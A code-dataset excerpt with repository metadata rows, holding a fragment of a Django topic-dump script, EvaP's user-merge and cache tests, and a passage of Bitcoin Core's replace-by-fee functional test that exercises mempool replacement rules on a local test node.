print '##########################################################'
print '### This file is generated by ./manage.py dump_topics. ###'
print '##########################################################'
print 'from tower import ugettext as _\n'
for tag in TaggedItem.tags_for(Document):
print '_("""{tag}""", "KB Topic")'.format(tag=tag.name)
| 35.944444 | 74 | 0.53323 |
b3ff712aa637333e97271cd44bd5b56d05e8873a | 14,323 | py | Python | evap/staff/tests/test_tools.py | Sohn123/EvaP | 8b0ba8365cb673ef59829cf8db5ab829472a9c58 | [
"MIT"
] | null | null | null | evap/staff/tests/test_tools.py | Sohn123/EvaP | 8b0ba8365cb673ef59829cf8db5ab829472a9c58 | [
"MIT"
] | null | null | null | evap/staff/tests/test_tools.py | Sohn123/EvaP | 8b0ba8365cb673ef59829cf8db5ab829472a9c58 | [
"MIT"
] | null | null | null | from django.test import TestCase
from django.contrib.auth.models import Group
from django.core.cache import cache
from django.core.cache.utils import make_template_fragment_key
from model_bakery import baker
from evap.evaluation.tests.tools import WebTest
from evap.evaluation.models import Contribution, Course, Evaluation, UserProfile
from evap.rewards.models import RewardPointGranting, RewardPointRedemption
from evap.staff.tools import merge_users, delete_navbar_cache_for_users, remove_user_from_represented_and_ccing_users
class NavbarCacheTest(WebTest):
def test_navbar_cache_deletion_for_users(self):
user1 = baker.make(UserProfile, email="user1@institution.example.com")
user2 = baker.make(UserProfile, email="user2@institution.example.com")
# create navbar caches for anonymous user, user1 and user2
self.app.get("/")
self.app.get("/results/", user="user1@institution.example.com")
self.app.get("/results/", user="user2@institution.example.com")
cache_key1 = make_template_fragment_key('navbar', [user1.email, 'en'])
cache_key2 = make_template_fragment_key('navbar', [user2.email, 'en'])
cache_key_anonymous = make_template_fragment_key('navbar', ['', 'en'])
self.assertIsNotNone(cache.get(cache_key1))
self.assertIsNotNone(cache.get(cache_key2))
self.assertIsNotNone(cache.get(cache_key_anonymous))
delete_navbar_cache_for_users([user2])
self.assertIsNotNone(cache.get(cache_key1))
self.assertIsNone(cache.get(cache_key2))
self.assertIsNotNone(cache.get(cache_key_anonymous))
class MergeUsersTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.user1 = baker.make(UserProfile, email="test1@institution.example.com")
cls.user2 = baker.make(UserProfile, email="test2@institution.example.com")
cls.user3 = baker.make(UserProfile, email="test3@institution.example.com")
cls.group1 = baker.make(Group, pk=4)
cls.group2 = baker.make(Group, pk=5)
cls.main_user = baker.make(UserProfile,
title="Dr.",
first_name="Main",
last_name="",
email=None, # test that merging works when taking the email from other user (UniqueConstraint)
groups=[cls.group1],
delegates=[cls.user1, cls.user2],
represented_users=[cls.user3],
cc_users=[cls.user1],
ccing_users=[]
)
cls.other_user = baker.make(UserProfile,
title="",
first_name="Other",
last_name="User",
email="other@test.com",
groups=[cls.group2],
delegates=[cls.user3],
represented_users=[cls.user1],
cc_users=[],
ccing_users=[cls.user1, cls.user2],
is_superuser=True
)
cls.course1 = baker.make(Course, responsibles=[cls.main_user])
cls.course2 = baker.make(Course, responsibles=[cls.main_user])
cls.course3 = baker.make(Course, responsibles=[cls.other_user])
cls.evaluation1 = baker.make(Evaluation, course=cls.course1, name_de="evaluation1", participants=[cls.main_user, cls.other_user]) # this should make the merge fail
cls.evaluation2 = baker.make(Evaluation, course=cls.course2, name_de="evaluation2", participants=[cls.main_user], voters=[cls.main_user])
cls.evaluation3 = baker.make(Evaluation, course=cls.course3, name_de="evaluation3", participants=[cls.other_user], voters=[cls.other_user])
cls.contribution1 = baker.make(Contribution, contributor=cls.main_user, evaluation=cls.evaluation1)
cls.contribution2 = baker.make(Contribution, contributor=cls.other_user, evaluation=cls.evaluation1) # this should make the merge fail
cls.contribution3 = baker.make(Contribution, contributor=cls.other_user, evaluation=cls.evaluation2)
cls.rewardpointgranting_main = baker.make(RewardPointGranting, user_profile=cls.main_user)
cls.rewardpointgranting_other = baker.make(RewardPointGranting, user_profile=cls.other_user)
cls.rewardpointredemption_main = baker.make(RewardPointRedemption, user_profile=cls.main_user)
cls.rewardpointredemption_other = baker.make(RewardPointRedemption, user_profile=cls.other_user)
def setUp(self):
# merge users changes these instances in such a way that refresh_from_db doesn't work anymore.
self.main_user = UserProfile.objects.get(first_name="Main", last_name="")
self.other_user = UserProfile.objects.get(email="other@test.com")
def test_merge_handles_all_attributes(self):
user1 = baker.make(UserProfile)
user2 = baker.make(UserProfile)
all_attrs = list(field.name for field in UserProfile._meta.get_fields(include_hidden=True))
# these are relations to intermediate models generated by django for m2m relations.
# we can safely ignore these since the "normal" fields of the m2m relations are present as well.
all_attrs = list(attr for attr in all_attrs if not attr.startswith("UserProfile_"))
# equally named fields are not supported, sorry
self.assertEqual(len(all_attrs), len(set(all_attrs)))
# some attributes we don't care about when merging
ignored_attrs = {
'id', # nothing to merge here
'password', # not used in production
'last_login', # something to really not care about
'user_permissions', # we don't use permissions
'logentry', # wtf
'login_key', # we decided to discard other_user's login key
'login_key_valid_until', # not worth dealing with
'language', # Not worth dealing with
'Evaluation_voters+', # some more intermediate models, for an explanation see above
'Evaluation_participants+', # intermediate model
}
expected_attrs = set(all_attrs) - ignored_attrs
# actual merge happens here
merged_user, errors, warnings = merge_users(user1, user2)
self.assertEqual(errors, [])
self.assertEqual(warnings, [])
handled_attrs = set(merged_user.keys())
# attributes that are handled in the merge method but that are not present in the merged_user dict
# add attributes here only if you're actually dealing with them in merge_users().
additional_handled_attrs = {
'grades_last_modified_user+',
'Course_responsibles+'
}
actual_attrs = handled_attrs | additional_handled_attrs
self.assertEqual(expected_attrs, actual_attrs)
def test_merge_users_does_not_change_data_on_fail(self):
__, errors, warnings = merge_users(self.main_user, self.other_user) # merge should fail
self.assertCountEqual(errors, ['contributions', 'evaluations_participating_in'])
self.assertCountEqual(warnings, ['rewards'])
# assert that nothing has changed
self.main_user.refresh_from_db()
self.other_user.refresh_from_db()
self.assertEqual(self.main_user.title, "Dr.")
self.assertEqual(self.main_user.first_name, "Main")
self.assertEqual(self.main_user.last_name, "")
self.assertEqual(self.main_user.email, None)
self.assertFalse(self.main_user.is_superuser)
self.assertEqual(set(self.main_user.groups.all()), {self.group1})
self.assertEqual(set(self.main_user.delegates.all()), {self.user1, self.user2})
self.assertEqual(set(self.main_user.represented_users.all()), {self.user3})
self.assertEqual(set(self.main_user.cc_users.all()), {self.user1})
self.assertEqual(set(self.main_user.ccing_users.all()), set())
self.assertTrue(RewardPointGranting.objects.filter(user_profile=self.main_user).exists())
self.assertTrue(RewardPointRedemption.objects.filter(user_profile=self.main_user).exists())
self.assertEqual(self.other_user.title, "")
self.assertEqual(self.other_user.first_name, "Other")
self.assertEqual(self.other_user.last_name, "User")
self.assertEqual(self.other_user.email, "other@test.com")
self.assertEqual(set(self.other_user.groups.all()), {self.group2})
self.assertEqual(set(self.other_user.delegates.all()), {self.user3})
self.assertEqual(set(self.other_user.represented_users.all()), {self.user1})
self.assertEqual(set(self.other_user.cc_users.all()), set())
self.assertEqual(set(self.other_user.ccing_users.all()), {self.user1, self.user2})
self.assertTrue(RewardPointGranting.objects.filter(user_profile=self.other_user).exists())
self.assertTrue(RewardPointRedemption.objects.filter(user_profile=self.other_user).exists())
self.assertEqual(set(self.course1.responsibles.all()), {self.main_user})
self.assertEqual(set(self.course2.responsibles.all()), {self.main_user})
self.assertEqual(set(self.course3.responsibles.all()), {self.other_user})
self.assertEqual(set(self.evaluation1.participants.all()), {self.main_user, self.other_user})
self.assertEqual(set(self.evaluation1.participants.all()), {self.main_user, self.other_user})
self.assertEqual(set(self.evaluation2.participants.all()), {self.main_user})
self.assertEqual(set(self.evaluation2.voters.all()), {self.main_user})
self.assertEqual(set(self.evaluation3.participants.all()), {self.other_user})
self.assertEqual(set(self.evaluation3.voters.all()), {self.other_user})
def test_merge_users_changes_data_on_success(self):
# Fix data so that the merge will not fail as in test_merge_users_does_not_change_data_on_fail
self.evaluation1.participants.set([self.main_user])
self.contribution2.delete()
__, errors, warnings = merge_users(self.main_user, self.other_user) # merge should succeed
self.assertEqual(errors, [])
self.assertEqual(warnings, ['rewards']) # rewards warning is still there
self.main_user.refresh_from_db()
self.assertEqual(self.main_user.title, "Dr.")
self.assertEqual(self.main_user.first_name, "Main")
self.assertEqual(self.main_user.last_name, "User")
self.assertEqual(self.main_user.email, "other@test.com")
self.assertTrue(self.main_user.is_superuser)
self.assertEqual(set(self.main_user.groups.all()), {self.group1, self.group2})
self.assertEqual(set(self.main_user.delegates.all()), {self.user1, self.user2, self.user3})
self.assertEqual(set(self.main_user.represented_users.all()), {self.user1, self.user3})
self.assertEqual(set(self.main_user.cc_users.all()), {self.user1})
self.assertEqual(set(self.main_user.ccing_users.all()), {self.user1, self.user2})
self.assertTrue(RewardPointGranting.objects.filter(user_profile=self.main_user).exists())
self.assertTrue(RewardPointRedemption.objects.filter(user_profile=self.main_user).exists())
self.assertEqual(set(self.course1.responsibles.all()), {self.main_user})
self.assertEqual(set(self.course2.responsibles.all()), {self.main_user})
self.assertEqual(set(self.course2.responsibles.all()), {self.main_user})
self.assertEqual(set(self.evaluation1.participants.all()), {self.main_user})
self.assertEqual(set(self.evaluation2.participants.all()), {self.main_user})
self.assertEqual(set(self.evaluation2.voters.all()), {self.main_user})
self.assertEqual(set(self.evaluation3.participants.all()), {self.main_user})
self.assertEqual(set(self.evaluation3.voters.all()), {self.main_user})
self.assertFalse(UserProfile.objects.filter(email="other_user@institution.example.com").exists())
self.assertFalse(RewardPointGranting.objects.filter(user_profile=self.other_user).exists())
self.assertFalse(RewardPointRedemption.objects.filter(user_profile=self.other_user).exists())
class RemoveUserFromRepresentedAndCCingUsersTest(TestCase):
def test_remove_user_from_represented_and_ccing_users(self):
delete_user = baker.make(UserProfile)
delete_user2 = baker.make(UserProfile)
user1 = baker.make(UserProfile, delegates=[delete_user, delete_user2], cc_users=[delete_user])
user2 = baker.make(UserProfile, delegates=[delete_user], cc_users=[delete_user, delete_user2])
messages = remove_user_from_represented_and_ccing_users(delete_user)
self.assertEqual([set(user1.delegates.all()), set(user1.cc_users.all())], [{delete_user2}, set()])
self.assertEqual([set(user2.delegates.all()), set(user2.cc_users.all())], [set(), {delete_user2}])
self.assertEqual(len(messages), 4)
messages2 = remove_user_from_represented_and_ccing_users(delete_user2)
self.assertEqual([set(user1.delegates.all()), set(user1.cc_users.all())], [set(), set()])
self.assertEqual([set(user2.delegates.all()), set(user2.cc_users.all())], [set(), set()])
self.assertEqual(len(messages2), 2)
def test_do_not_remove_from_ignored_users(self):
delete_user = baker.make(UserProfile)
user1 = baker.make(UserProfile, delegates=[delete_user], cc_users=[delete_user])
user2 = baker.make(UserProfile, delegates=[delete_user], cc_users=[delete_user])
messages = remove_user_from_represented_and_ccing_users(delete_user, [user2])
self.assertEqual([set(user1.delegates.all()), set(user1.cc_users.all())], [set(), set()])
self.assertEqual([set(user2.delegates.all()), set(user2.cc_users.all())], [{delete_user}, {delete_user}])
self.assertEqual(len(messages), 2)
def test_do_nothing_if_test_run(self):
delete_user = baker.make(UserProfile)
user1 = baker.make(UserProfile, delegates=[delete_user], cc_users=[delete_user])
user2 = baker.make(UserProfile, delegates=[delete_user], cc_users=[delete_user])
messages = remove_user_from_represented_and_ccing_users(delete_user, test_run=True)
self.assertEqual([set(user1.delegates.all()), set(user1.cc_users.all())], [{delete_user}, {delete_user}])
self.assertEqual([set(user2.delegates.all()), set(user2.cc_users.all())], [{delete_user}, {delete_user}])
self.assertEqual(len(messages), 4)
| 56.837302 | 172 | 0.702367 |
d759a5aab5ee09f4975c12551de36e2dda78f418 | 26,026 | py | Python | test/functional/feature_rbf.py | cocovault/bitcoin | 5455279a71e01c0bf9ed3070fa597e8f4e750e9d | [
"MIT"
] | 213 | 2015-01-25T19:45:22.000Z | 2022-02-24T22:48:03.000Z | test/functional/feature_rbf.py | cocovault/bitcoin | 5455279a71e01c0bf9ed3070fa597e8f4e750e9d | [
"MIT"
] | 43 | 2015-01-20T19:37:19.000Z | 2021-04-28T13:01:56.000Z | test/functional/feature_rbf.py | cocovault/bitcoin | 5455279a71e01c0bf9ed3070fa597e8f4e750e9d | [
"MIT"
] | 32 | 2015-05-12T17:42:55.000Z | 2022-01-26T11:02:51.000Z | #!/usr/bin/env python3
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RBF code."""
from copy import deepcopy
from decimal import Decimal
from test_framework.messages import (
BIP125_SEQUENCE_NUMBER,
COIN,
COutPoint,
CTransaction,
CTxIn,
CTxOut,
)
from test_framework.script import CScript, OP_DROP
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
from test_framework.script_util import (
DUMMY_P2WPKH_SCRIPT,
DUMMY_2_P2WPKH_SCRIPT,
)
from test_framework.wallet import MiniWallet
MAX_REPLACEMENT_LIMIT = 100
class ReplaceByFeeTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.extra_args = [
[
"-acceptnonstdtxn=1",
"-maxorphantx=1000",
"-limitancestorcount=50",
"-limitancestorsize=101",
"-limitdescendantcount=200",
"-limitdescendantsize=101",
],
]
self.supports_cli = False
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
self.wallet = MiniWallet(self.nodes[0])
# the pre-mined test framework chain contains coinbase outputs to the
# MiniWallet's default address ADDRESS_BCRT1_P2WSH_OP_TRUE in blocks
# 76-100 (see method BitcoinTestFramework._initialize_chain())
self.wallet.rescan_utxos()
self.log.info("Running test simple doublespend...")
self.test_simple_doublespend()
self.log.info("Running test doublespend chain...")
self.test_doublespend_chain()
self.log.info("Running test doublespend tree...")
self.test_doublespend_tree()
self.log.info("Running test replacement feeperkb...")
self.test_replacement_feeperkb()
self.log.info("Running test spends of conflicting outputs...")
self.test_spends_of_conflicting_outputs()
self.log.info("Running test new unconfirmed inputs...")
self.test_new_unconfirmed_inputs()
self.log.info("Running test too many replacements...")
self.test_too_many_replacements()
self.log.info("Running test opt-in...")
self.test_opt_in()
self.log.info("Running test RPC...")
self.test_rpc()
self.log.info("Running test prioritised transactions...")
self.test_prioritised_transactions()
self.log.info("Running test no inherited signaling...")
self.test_no_inherited_signaling()
self.log.info("Running test replacement relay fee...")
self.test_replacement_relay_fee()
self.log.info("Passed")
def make_utxo(self, node, amount, confirmed=True, scriptPubKey=DUMMY_P2WPKH_SCRIPT):
"""Create a txout with a given amount and scriptPubKey
confirmed - txouts created will be confirmed in the blockchain;
unconfirmed otherwise.
"""
txid, n = self.wallet.send_to(from_node=node, scriptPubKey=scriptPubKey, amount=amount)
# If requested, ensure txouts are confirmed.
if confirmed:
mempool_size = len(node.getrawmempool())
while mempool_size > 0:
self.generate(node, 1)
new_size = len(node.getrawmempool())
# Error out if we have something stuck in the mempool, as this
# would likely be a bug.
assert new_size < mempool_size
mempool_size = new_size
return COutPoint(int(txid, 16), n)
def test_simple_doublespend(self):
"""Simple doublespend"""
# we use MiniWallet to create a transaction template with inputs correctly set,
# and modify the output (amount, scriptPubKey) according to our needs
tx_template = self.wallet.create_self_transfer(from_node=self.nodes[0])['tx']
tx1a = deepcopy(tx_template)
tx1a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx1a_hex = tx1a.serialize().hex()
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, 0)
# Should fail because we haven't changed the fee
tx1b = deepcopy(tx_template)
tx1b.vout = [CTxOut(1 * COIN, DUMMY_2_P2WPKH_SCRIPT)]
tx1b_hex = tx1b.serialize().hex()
# This will raise an exception due to insufficient fee
assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, tx1b_hex, 0)
# Extra 0.1 BTC fee
tx1b.vout[0].nValue -= int(0.1 * COIN)
tx1b_hex = tx1b.serialize().hex()
# Works when enabled
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, 0)
mempool = self.nodes[0].getrawmempool()
assert tx1a_txid not in mempool
assert tx1b_txid in mempool
assert_equal(tx1b_hex, self.nodes[0].getrawtransaction(tx1b_txid))
def test_doublespend_chain(self):
"""Doublespend of a long chain"""
initial_nValue = 5 * COIN
tx0_outpoint = self.make_utxo(self.nodes[0], initial_nValue)
prevout = tx0_outpoint
remaining_value = initial_nValue
chain_txids = []
while remaining_value > 1 * COIN:
remaining_value -= int(0.1 * COIN)
tx = CTransaction()
tx.vin = [CTxIn(prevout, nSequence=0)]
tx.vout = [CTxOut(remaining_value, CScript([1, OP_DROP] * 15 + [1]))]
tx_hex = tx.serialize().hex()
txid = self.nodes[0].sendrawtransaction(tx_hex, 0)
chain_txids.append(txid)
prevout = COutPoint(int(txid, 16), 0)
# Whether the double-spend is allowed is evaluated by including all
# child fees - 4 BTC - so this attempt is rejected.
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - 3 * COIN, DUMMY_P2WPKH_SCRIPT)]
dbl_tx_hex = dbl_tx.serialize().hex()
# This will raise an exception due to insufficient fee
assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, dbl_tx_hex, 0)
# Accepted with sufficient fee
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(int(0.1 * COIN), DUMMY_P2WPKH_SCRIPT)]
dbl_tx_hex = dbl_tx.serialize().hex()
self.nodes[0].sendrawtransaction(dbl_tx_hex, 0)
mempool = self.nodes[0].getrawmempool()
for doublespent_txid in chain_txids:
assert doublespent_txid not in mempool
def test_doublespend_tree(self):
"""Doublespend of a big tree of transactions"""
initial_nValue = 5 * COIN
tx0_outpoint = self.make_utxo(self.nodes[0], initial_nValue)
def branch(prevout, initial_value, max_txs, tree_width=5, fee=0.00001 * COIN, _total_txs=None):
if _total_txs is None:
_total_txs = [0]
if _total_txs[0] >= max_txs:
return
txout_value = (initial_value - fee) // tree_width
if txout_value < fee:
return
vout = [CTxOut(txout_value, CScript([i+1]))
for i in range(tree_width)]
tx = CTransaction()
tx.vin = [CTxIn(prevout, nSequence=0)]
tx.vout = vout
tx_hex = tx.serialize().hex()
assert len(tx.serialize()) < 100000
txid = self.nodes[0].sendrawtransaction(tx_hex, 0)
yield tx
_total_txs[0] += 1
txid = int(txid, 16)
for i, txout in enumerate(tx.vout):
for x in branch(COutPoint(txid, i), txout_value,
max_txs,
tree_width=tree_width, fee=fee,
_total_txs=_total_txs):
yield x
fee = int(0.00001 * COIN)
n = MAX_REPLACEMENT_LIMIT
tree_txs = list(branch(tx0_outpoint, initial_nValue, n, fee=fee))
assert_equal(len(tree_txs), n)
# Attempt double-spend, will fail because too little fee paid
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - fee * n, DUMMY_P2WPKH_SCRIPT)]
dbl_tx_hex = dbl_tx.serialize().hex()
# This will raise an exception due to insufficient fee
assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, dbl_tx_hex, 0)
# 0.1 BTC fee is enough
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - fee * n - int(0.1 * COIN), DUMMY_P2WPKH_SCRIPT)]
dbl_tx_hex = dbl_tx.serialize().hex()
self.nodes[0].sendrawtransaction(dbl_tx_hex, 0)
mempool = self.nodes[0].getrawmempool()
for tx in tree_txs:
tx.rehash()
assert tx.hash not in mempool
# Try again, but with more total transactions than the "max txs
# double-spent at once" anti-DoS limit.
for n in (MAX_REPLACEMENT_LIMIT + 1, MAX_REPLACEMENT_LIMIT * 2):
fee = int(0.00001 * COIN)
tx0_outpoint = self.make_utxo(self.nodes[0], initial_nValue)
tree_txs = list(branch(tx0_outpoint, initial_nValue, n, fee=fee))
assert_equal(len(tree_txs), n)
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - 2 * fee * n, DUMMY_P2WPKH_SCRIPT)]
dbl_tx_hex = dbl_tx.serialize().hex()
# This will raise an exception
assert_raises_rpc_error(-26, "too many potential replacements", self.nodes[0].sendrawtransaction, dbl_tx_hex, 0)
for tx in tree_txs:
tx.rehash()
self.nodes[0].getrawtransaction(tx.hash)
def test_replacement_feeperkb(self):
"""Replacement requires fee-per-KB to be higher"""
tx0_outpoint = self.make_utxo(self.nodes[0], int(1.1 * COIN))
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx1a_hex = tx1a.serialize().hex()
self.nodes[0].sendrawtransaction(tx1a_hex, 0)
# Higher fee, but the fee per KB is much lower, so the replacement is
# rejected.
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.001 * COIN), CScript([b'a' * 999000]))]
tx1b_hex = tx1b.serialize().hex()
# This will raise an exception due to insufficient fee
assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, tx1b_hex, 0)
def test_spends_of_conflicting_outputs(self):
"""Replacements that spend conflicting tx outputs are rejected"""
utxo1 = self.make_utxo(self.nodes[0], int(1.2 * COIN))
utxo2 = self.make_utxo(self.nodes[0], 3 * COIN)
tx1a = CTransaction()
tx1a.vin = [CTxIn(utxo1, nSequence=0)]
tx1a.vout = [CTxOut(int(1.1 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx1a_hex = tx1a.serialize().hex()
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, 0)
tx1a_txid = int(tx1a_txid, 16)
# Direct spend an output of the transaction we're replacing.
tx2 = CTransaction()
tx2.vin = [CTxIn(utxo1, nSequence=0), CTxIn(utxo2, nSequence=0)]
tx2.vin.append(CTxIn(COutPoint(tx1a_txid, 0), nSequence=0))
tx2.vout = tx1a.vout
tx2_hex = tx2.serialize().hex()
# This will raise an exception
assert_raises_rpc_error(-26, "bad-txns-spends-conflicting-tx", self.nodes[0].sendrawtransaction, tx2_hex, 0)
# Spend tx1a's output to test the indirect case.
tx1b = CTransaction()
tx1b.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0)]
tx1b.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx1b_hex = tx1b.serialize().hex()
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, 0)
tx1b_txid = int(tx1b_txid, 16)
tx2 = CTransaction()
tx2.vin = [CTxIn(utxo1, nSequence=0), CTxIn(utxo2, nSequence=0),
CTxIn(COutPoint(tx1b_txid, 0))]
tx2.vout = tx1a.vout
tx2_hex = tx2.serialize().hex()
# This will raise an exception
assert_raises_rpc_error(-26, "bad-txns-spends-conflicting-tx", self.nodes[0].sendrawtransaction, tx2_hex, 0)
def test_new_unconfirmed_inputs(self):
"""Replacements that add new unconfirmed inputs are rejected"""
confirmed_utxo = self.make_utxo(self.nodes[0], int(1.1 * COIN))
unconfirmed_utxo = self.make_utxo(self.nodes[0], int(0.1 * COIN), False)
tx1 = CTransaction()
tx1.vin = [CTxIn(confirmed_utxo)]
tx1.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx1_hex = tx1.serialize().hex()
self.nodes[0].sendrawtransaction(tx1_hex, 0)
tx2 = CTransaction()
tx2.vin = [CTxIn(confirmed_utxo), CTxIn(unconfirmed_utxo)]
tx2.vout = tx1.vout
tx2_hex = tx2.serialize().hex()
# This will raise an exception
assert_raises_rpc_error(-26, "replacement-adds-unconfirmed", self.nodes[0].sendrawtransaction, tx2_hex, 0)
def test_too_many_replacements(self):
"""Replacements that evict too many transactions are rejected"""
# Try directly replacing more than MAX_REPLACEMENT_LIMIT
# transactions
# Start by creating a single transaction with many outputs
initial_nValue = 10 * COIN
utxo = self.make_utxo(self.nodes[0], initial_nValue)
fee = int(0.0001 * COIN)
split_value = int((initial_nValue - fee) / (MAX_REPLACEMENT_LIMIT + 1))
outputs = []
for _ in range(MAX_REPLACEMENT_LIMIT + 1):
outputs.append(CTxOut(split_value, CScript([1])))
splitting_tx = CTransaction()
splitting_tx.vin = [CTxIn(utxo, nSequence=0)]
splitting_tx.vout = outputs
splitting_tx_hex = splitting_tx.serialize().hex()
txid = self.nodes[0].sendrawtransaction(splitting_tx_hex, 0)
txid = int(txid, 16)
# Now spend each of those outputs individually
for i in range(MAX_REPLACEMENT_LIMIT + 1):
tx_i = CTransaction()
tx_i.vin = [CTxIn(COutPoint(txid, i), nSequence=0)]
tx_i.vout = [CTxOut(split_value - fee, DUMMY_P2WPKH_SCRIPT)]
tx_i_hex = tx_i.serialize().hex()
self.nodes[0].sendrawtransaction(tx_i_hex, 0)
# Now create doublespend of the whole lot; should fail.
# Need a big enough fee to cover all spending transactions and have
# a higher fee rate
double_spend_value = (split_value - 100 * fee) * (MAX_REPLACEMENT_LIMIT + 1)
inputs = []
for i in range(MAX_REPLACEMENT_LIMIT + 1):
inputs.append(CTxIn(COutPoint(txid, i), nSequence=0))
double_tx = CTransaction()
double_tx.vin = inputs
double_tx.vout = [CTxOut(double_spend_value, CScript([b'a']))]
double_tx_hex = double_tx.serialize().hex()
# This will raise an exception
assert_raises_rpc_error(-26, "too many potential replacements", self.nodes[0].sendrawtransaction, double_tx_hex, 0)
# If we remove an input, it should pass
double_tx = CTransaction()
double_tx.vin = inputs[0:-1]
double_tx.vout = [CTxOut(double_spend_value, CScript([b'a']))]
double_tx_hex = double_tx.serialize().hex()
self.nodes[0].sendrawtransaction(double_tx_hex, 0)
def test_opt_in(self):
"""Replacing should only work if orig tx opted in"""
tx0_outpoint = self.make_utxo(self.nodes[0], int(1.1 * COIN))
# Create a non-opting in transaction
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0xffffffff)]
tx1a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx1a_hex = tx1a.serialize().hex()
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, 0)
# This transaction isn't shown as replaceable
assert_equal(self.nodes[0].getmempoolentry(tx1a_txid)['bip125-replaceable'], False)
# Shouldn't be able to double-spend
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.9 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx1b_hex = tx1b.serialize().hex()
# This will raise an exception
assert_raises_rpc_error(-26, "txn-mempool-conflict", self.nodes[0].sendrawtransaction, tx1b_hex, 0)
tx1_outpoint = self.make_utxo(self.nodes[0], int(1.1 * COIN))
# Create a different non-opting in transaction
tx2a = CTransaction()
tx2a.vin = [CTxIn(tx1_outpoint, nSequence=0xfffffffe)]
tx2a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx2a_hex = tx2a.serialize().hex()
tx2a_txid = self.nodes[0].sendrawtransaction(tx2a_hex, 0)
# Still shouldn't be able to double-spend
tx2b = CTransaction()
tx2b.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2b.vout = [CTxOut(int(0.9 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx2b_hex = tx2b.serialize().hex()
# This will raise an exception
assert_raises_rpc_error(-26, "txn-mempool-conflict", self.nodes[0].sendrawtransaction, tx2b_hex, 0)
# Now create a new transaction that spends from tx1a and tx2a
# opt-in on one of the inputs
# Transaction should be replaceable on either input
tx1a_txid = int(tx1a_txid, 16)
tx2a_txid = int(tx2a_txid, 16)
tx3a = CTransaction()
tx3a.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0xffffffff),
CTxIn(COutPoint(tx2a_txid, 0), nSequence=0xfffffffd)]
tx3a.vout = [CTxOut(int(0.9 * COIN), CScript([b'c'])), CTxOut(int(0.9 * COIN), CScript([b'd']))]
tx3a_hex = tx3a.serialize().hex()
tx3a_txid = self.nodes[0].sendrawtransaction(tx3a_hex, 0)
# This transaction is shown as replaceable
assert_equal(self.nodes[0].getmempoolentry(tx3a_txid)['bip125-replaceable'], True)
tx3b = CTransaction()
tx3b.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0)]
tx3b.vout = [CTxOut(int(0.5 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx3b_hex = tx3b.serialize().hex()
tx3c = CTransaction()
tx3c.vin = [CTxIn(COutPoint(tx2a_txid, 0), nSequence=0)]
tx3c.vout = [CTxOut(int(0.5 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx3c_hex = tx3c.serialize().hex()
self.nodes[0].sendrawtransaction(tx3b_hex, 0)
# If tx3b was accepted, tx3c won't look like a replacement,
# but make sure it is accepted anyway
self.nodes[0].sendrawtransaction(tx3c_hex, 0)
def test_prioritised_transactions(self):
# Ensure that fee deltas used via prioritisetransaction are
# correctly used by replacement logic
# 1. Check that feeperkb uses modified fees
tx0_outpoint = self.make_utxo(self.nodes[0], int(1.1 * COIN))
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx1a_hex = tx1a.serialize().hex()
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, 0)
# Higher fee, but the actual fee per KB is much lower.
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.001 * COIN), CScript([b'a' * 740000]))]
tx1b_hex = tx1b.serialize().hex()
# Verify tx1b cannot replace tx1a.
